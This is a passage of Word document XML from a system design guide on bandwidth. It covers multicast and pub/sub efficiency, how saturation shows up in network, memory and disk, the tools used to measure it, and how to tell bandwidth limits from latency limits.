    <w:p w14:paraId="36ED3204" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Unicast: 1000 copies × 1 KB = 1 MB outbound bandwidth from server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A48EE8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Multicast (network-level efficiency):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B30BF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A00C0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Multicast: 1 copy sent by server → network replicates to 1000 receivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DBBF35" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server outbound: 1 KB (network handles replication at routers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44433EF4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where multicast is used in system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2E34A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Financial market data feeds (millions of subscribers, microsecond-level data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66871E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>IPTV/live streaming (one source, millions of viewers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A5FB1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cluster coordination (heartbeats, membership updates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4515E251" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Service discovery announcements within a datacenter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73980F2B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level pub/sub (Kafka, SNS) as a bandwidth optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8AEB58" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Even without IP multicast, message brokers provide similar benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73593A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Producer sends a message ONCE to the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332B9C5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Broker stores it once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DA125" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>N consumers each read it (but from local storage, not from the producer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBD578" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Producer bandwidth is independent of consumer count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F692BF1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="46770F51">
          <v:rect id="_x0000_i4376" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C7A41A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Bandwidth Bottlenecks and How to Identify Them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF547B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Symptoms of Bandwidth Saturation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7988E71E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network bandwidth saturated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14177498" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Packet loss increases (buffers overflow → drops).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E0A716" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Latency increases (packets queue in buffers before being sent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76D5DA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Throughput plateaus (adding more requests doesn't increase total throughput).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6E462" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP retransmissions spike (lost packets need retransmission).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A47BC9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP windows shrink (congestion control backs off).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DB558" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory bandwidth saturated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792DD51" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>CPU utilization appears low (cores are stalling, waiting for data from RAM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78413913" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Instructions-per-cycle (IPC) drops dramatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79378722" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cache miss rate increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62481FA8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Adding more threads doesn't improve throughput (all threads compete for memory bus).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F35710" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disk bandwidth saturated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295FAAED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>I/O wait time increases (processes blocked waiting for disk).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CFCB8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Disk utilization (from iostat) approaches 100%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E808A5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Read/write throughput hits the physical limit of the device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA067B3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Queue depth increases (requests waiting to be serviced by disk).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB71BFD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Tools for Measuring Bandwidth Utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB98A34" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F7F02B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>iftop / nload: Real-time interface bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC55E17" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>sar -n DEV: Historical network statistics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B7623C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>tc (traffic control): Measure and shape bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23408C63" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>iperf3: Benchmark maximum achievable bandwidth between two points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E567DB7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cloud provider metrics: VPC flow logs, CloudWatch network metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721C7D2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBA452" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>perf stat: Memory bandwidth utilization (reads/writes per second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DBC03E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Intel Memory Bandwidth Monitoring (MBM): Per-process memory bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AFE4A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>likwid-perfctr: Detailed memory hierarchy bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA28B7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8A110" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>iostat -x: Disk bandwidth utilization (MB/s read/written).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277BF93" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>fio: Benchmark disk bandwidth under various I/O patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD3F4D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>blktrace: Detailed I/O tracing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7218BB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Bandwidth vs. Latency Bottleneck — How to Differentiate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B9AC6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth-limited workload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DD536E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Throughput is constant regardless of latency changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD670F6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Adding parallelism doesn't help (the pipe is full).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B878F7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Larger payloads → linearly more time (time = size / bandwidth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45056F47" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Reducing message size directly improves throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8ABE92" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency-limited workload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BDE7B0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Throughput varies with latency (faster responses → more operations per second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E467F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Adding parallelism helps (each parallel stream has its own latency penalty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A933DD8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Payload size doesn't matter much (most time spent waiting, not transferring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB85AC9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Reducing round trips improves throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547FD09F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46734A7D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Service A calls Service B with 200ms latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD785F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Payload: 1 KB. Transfer time at 1 Gbps: 0.008ms. Total: 200.008ms → LATENCY-LIMITED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FFC1FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Payload: 1 GB. Transfer time at 1 Gbps: 8000ms. Total: 8200ms → BANDWIDTH-LIMITED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C1A27B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For the 1 KB case: increasing bandwidth from 1 Gbps to 100 Gbps saves 0.007ms (irrelevant). Reducing latency from 200ms to 10ms saves 190ms (massive improvement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668342E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For the 1 GB case: reducing latency from 200ms to 10ms saves 190ms (2.3% improvement). Increasing bandwidth from 1 Gbps to 10 Gbps saves 7200ms (87% improvement — dominant factor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA088F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="60936CF7">
          <v:rect id="_x0000_i4377" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1726B9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Bandwidth in Specific System Design Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053559B5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8.1 Video Streaming — The Bandwidth-Dominant Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF27B4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth requirements by quality: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78"/>
        <w:gridCol w:w="1637"/>
        <w:gridCol w:w="2532"/>
        <w:gridCol w:w="2629"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6A30932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631203" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Quality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B6CCF6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
